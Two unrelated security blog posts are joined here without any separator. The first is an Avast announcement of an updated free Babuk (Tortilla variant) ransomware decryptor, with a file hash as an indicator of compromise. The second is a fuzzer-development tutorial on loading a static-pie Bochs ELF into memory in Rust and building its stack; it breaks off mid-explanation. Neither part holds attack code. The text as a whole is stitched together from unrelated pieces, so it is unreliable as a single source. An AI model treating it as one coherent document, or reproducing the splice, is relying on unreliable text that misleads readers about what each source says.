Today, in cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla. To download the tool, click here.

Babuk attacks blocked by Avast since 2021

Babuk Ransomware Decryptor 

In September 2021, the source code of the Babuk ransomware was released on a Russian-speaking hacking forum. The ZIP file also contained 14 private keys (one for each victim). Those keys were ECDH-25519 private keys needed for decryption of files encrypted by the Babuk ransomware. 

The Tortilla Campaign 

After brief examination of the provided sample (originally named tortilla.exe), we found out that the encryption schema had not changed since we analyzed Babuk samples 2 years ago. The process of extending the decryptor was therefore straightforward. 

The Babuk encryptor was likely created from the leaked sources using the build tool. According to Cisco Talos, a single private key is used for all victims of the Tortilla threat actor. This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files. As with all Avast decryptors, the Babuk Ransomware Decryptor is available for free. 

Babuk victims can find out whether they were part of the Tortilla campaign by looking at the extension of the encrypted files and the ransom note file. Files encrypted by the ransomware have the .babyk extension as shown in the following example:

The ransom note file is called How To Restore Your Files.txt and is dropped to every directory. This is how the ransom note looks like:

Babuk victims can download the Babuk Decryptor for free: https://files.avast.com/files/decryptor/avast_decryptor_babuk.exe. It is also available within the NoMoreRansom project. 

We would like to thank Cisco Talos and the Dutch Police for the cooperation.

IOCs (indicators of compromise) 

bd26b65807026a70909d38c48f2a9e0f8730b1126e80ef078e29e10379722b49 (tortilla.exe) 

The post Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police appeared first on Avast Threat Labs.

Fuzzer Development 1: The Soul of a New Machine

By: h0mbre

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited gamozolabs (Brandon Falk’s) stream paper review he did on the Nyx paper. It’s a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

  • it is relatively simple in its design,
  • it allows for almost endless introspection utilities to be added,
  • it lends itself well to iterative development cycles,
  • it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
  • it can fuzz the Linux Kernel,
  • it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
  • it is pretty unique in its design compared to open source fuzzing tools that exist,
  • it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
  • there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
  • it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,
  • it will allow me to do a lot of learning and low-level computing research and learning.

So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure he’d be ok with it as I didn’t want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and we’re off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.

Misc

Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.

Bochs

What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look: Fuzzer Architecture

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

So in order to make this portion of loading Bochs in memory in the most simplistic way possible, I’ve chosen to compile Bochs as a -static-pie ELF. Now this means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters > 5) { return 0; }
    }
}

Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.

So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment. Likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of the this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,
}

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 
}

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

  • Flags describes the memory permissions this segment should have, we have 3 distinct memory protection schemes READ, READ | EXECUTE, and READ | WRITE
  • Offset describes how far into the physical file contents we can expect to find this segment
  • PhysAddr we don’t much care about
  • VirtAddr the virtual address this segment should be loaded at, you can tell that the first segment value for this is 0x0000000000000000 which means that it has no expectations about where it’s to be loaded.
  • MemSiz how large the segment should be in virtual memory
  • Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after the segments that aren’t page aligned, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }
    }
}

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “end_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // We don't want to specify a fixed address
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {
        libc::mmap(
            addr,
            length,
            prot,
            flags,
            fd,
            offset
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
    }

    Ok(result as usize)
}

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
            load_segments.push((
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4
            ));
        }
    }

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);
    }

    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the last 0x1000 bytes so 
    // that we are always page-aligned as required by `mprotect`
    let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length
    let mprotect_len = segment.2 as libc::size_t;

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {
        libc::mprotect(
            mprotect_addr,
            mprotect_len,
            mprotect_prot
        )
    };

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
    }
}

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new “process” which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)
  ------------------------------------------------------------------------

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated at the end.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➤  info aux
33   AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
51   ???                                                 0xe30
16   AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
6    AT_PAGESZ            System page size               4096
17   AT_CLKTCK            Frequency of times()           100
3    AT_PHDR              Program headers for program    0x7ffff7f30040
4    AT_PHENT             Size of program header entry   56
5    AT_PHNUM             Number of program headers      12
7    AT_BASE              Base address of interpreter    0x0
8    AT_FLAGS             Flags                          0x0
9    AT_ENTRY             Entry point of program         0x7ffff7f39f50
11   AT_UID               Real user ID                   1000
12   AT_EUID              Effective user ID              1000
13   AT_GID               Real group ID                  1000
14   AT_EGID              Effective group ID             1000
23   AT_SECURE            Boolean, was exec setuid-like? 0
25   AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
26   AT_HWCAP2            Extension of AT_HWCAP          0x2
31   AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
15   AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
0    AT_NULL              End of vector                  0x0

The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➤  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

You can see the towards the end of the data at 0x7fffffffe2d8 we can see the key 0x5, and at 0x7fffffffe2e0 we can see the value 0xc which is 12 in hex. We need some of these in order to load our ELF properly as the ELF _start routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:

  • AT_ENTRY which holds the program entry point,
  • AT_PHDR which is a pointer to the program header data,
  • AT_PHNUM which is the number of program headers,
  • AT_RANDOM which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of 0x4141414141414141 and ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
  • AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.

So the first value we place onto the stack is the “end-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;
    arg_lens.push(arg_len);
}

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator
    bytes.push(0x0);

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }
    }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate 
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped ennvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

